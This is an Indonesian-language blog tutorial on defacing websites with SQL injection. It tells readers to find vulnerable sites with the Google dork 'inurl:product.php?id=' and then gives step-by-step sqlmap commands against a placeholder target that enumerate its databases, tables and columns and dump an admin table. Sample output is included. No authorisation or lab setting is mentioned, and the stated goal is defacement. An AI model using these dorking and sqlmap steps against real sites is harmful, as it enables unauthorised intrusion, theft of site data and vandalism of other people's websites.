Deface Website Dengan SQLmap di Backtrack 5r3


Pertama, cari target dengan google dork,kali ini mrq menggunakan dork
inurl:product.php?id=
sebagai tambahan, gunakan seni googling kalian untuk mendapatkan dork  yang bisa di manfaatkan :-D
 Sekarang buka terminal, dan ketik/copas command berikut

cd /pentest/database/sqlmap
dan untuk command berikutnya,


python ./sqlmap.py -u http://www.target-ente.com/product.php?id=2 --dbs

OK, sekarang kita dapat 4 database
available databases [4]:
[*] information_schema
[*] LIGHT_SPEED_OUTDOORS
[*] LIGHT_SPEED_TENTS
[*] test
Selanjutnya mari kita lihat apasih yang ada di balik database itu,
python ./sqlmap.py -u http://www.target-ente.com/product.php?id=2 -D LIGHT_SPEED_OUTDOORS --tables

 Nah, menurut ente mana dari nama table yang mencurigakan? hhmmm mari kita coba WEB_SESSION
Commandnya seperti ini


python ./sqlmap.py -u http://www.target-ente.com/product.php?id=2 -T WEB_SESSION --columns

Wew, ente dapat apa?
Untuk melihat ada apa di baliknya, gunakan Command berikut
python sqlmap.py -u http://www.target-ente.com/product.php?id=2 -T admin -U test --dump

Udah belum? kalo udah ya berarti beres!
Loh, segitu doank? #yap, selanjutnya silahkan ente kerjakan sendiri ye...

Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 komentar:

Posting Komentar